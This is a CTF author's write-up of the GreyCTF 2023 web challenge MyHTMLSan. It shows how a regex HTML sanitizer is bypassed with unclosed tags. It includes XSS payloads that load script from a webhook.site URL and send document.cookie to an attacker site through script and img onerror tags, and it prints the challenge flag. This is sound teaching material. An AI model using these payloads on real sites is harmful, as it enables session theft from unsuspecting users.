- Jh123x: Blog, Code, Fun and everything in between./
- My Blog Posts and Stories/
- GreyCTF 2023 Finals: MyHTMLSan/
GreyCTF 2023 Finals: MyHTMLSan
Table of Contents
This is the author’s writeup for the challenges MyHTMLSan in the web category.
This describes the intended solution when I made the challenge.
Challenge description #
LiveOverflow inspired me to host html files, I hope I made them safe enough.
- Junhua
There was no source code for this challenge, only a link to the website.
My Notes #
- This was meant to be an easy challenge.
- The inspiration for the challenge came from LiveOverflow’s video on HTML Specification.
- Source Code can be found here.
- Could have locked it down further with a black list or set the headless browser to not follow redirects.
Notes to future self when setting up this challenge. #
- Spend more time to check for unexpected solutions
The Website #


The submission location is using UUID to prevent users from guessing the location of other submissions.
Looking at the question #
As you can see from the image above, we can see that normal text is not sanitized by the page. Let us try to use some HTML Tags.
After submitting <h1>test</h1>, we see the following output.

<h1>test</h1>We can see from the above that the h1 tags were stripped.
To complete this challenge, we will have to find some sort of XSS vulnerability within the website and prompt the admin to visit the website to exploit it.
Finding the XSS vulnerability #
Another hint that we have yet to look into is the LiveOverflow video that is embedded in the website. Within the video, he talks about how he has “discovered” a html sanitizer bypass that allows him to inject javascript into the website but eventually found out that it was a perk of the HTML specification.
He also mentions specifically that any opening tags < followed by numbers, IE: [0-9] are not counted as HTML tags and will be rewritten.
Let us try the example that he gave in the question, <22 foo="bar<h1>">test</22>.

We can see from the image that this too was stripped from the output.
Hmm… maybe there was something else in the video that hints at the answer for this question.
Towards the end of the video, he talks about how HTML Cannot be parsed using regex. He then shows us an example of a regex that he found online that can parse HTML.
Perhaps the sanitizer is made from regex.
Regex from the video #
The post that he mentioned in the video here
The main regex that was shown is <(?:"[^"]*"['"]*|'[^']*'['"]*|[^'">])+>. This regex is used to match HTML tags.
However, there are some issues with this regex.
It does not match any tags that do not have a closing tag. (IE: <br instead of <br />)
Let us try it out on the website.

For the above result, we submitted the payload <h1 without the closing tag.
As you can see from the rendered HTML, the h1 tag was not sanitized.
The solution #
With that, we can make use of different tags to inject our javascript payload. There are multiple solutions.
Script Payload #
<script src="https://github.com/Jh123x/payload/raw/main/alert.js"

With the payload above, it was shown correctly as a script tag on the page.

However, the chrome browser blocked the loading of the script.
This is due to a feature in chrome which blocks Cross Origin Reads for more information you can visit the link above.
TLDR: Chrome blocks the loading of scripts from other domains which are not of content type text/javascript.
Thus, to make it work, we will have to make use of tools like webhook.site.

Over here we can edit the payload that appears when someone visits our website.
<script src="https://webhook.site/7ee53c33-a346-45da-8183-99142b31efcd"
Now with the above payload, we should be able to load any javascript that we want.

Now that we can trigger an alert, we can simply change the script to a redirect request before reporting the page to the admin to get the flag.
document.location.href = "<your site here>?cookie=" + document.cookie;
We can simply redirect to the page that we want with the admin’s cookie and retrieve the flag.
Img Payload #
There is also an alternative using the img tag as well
<img src="aa" onerror="document.location.href='<site here>?cookies='+document.cookie"
This will have the same effect as the script tag above (and is faster).
Flag #
Flag: grey{r3geX_1s_N0t_4_htm1_cee664daa169f7cdb53f87ab810ccb15}
Useful Links #
- LiveOverflow’s video on HTML Specification to learn about parsing HTML with Regex
- Webhook.Site to have a attacker controlled server to get cookies
- CORB to learn about why chrome blocks the script from loading
- MyHtmlSan Source Code
- StackOverflow Post on why you should not use regex on html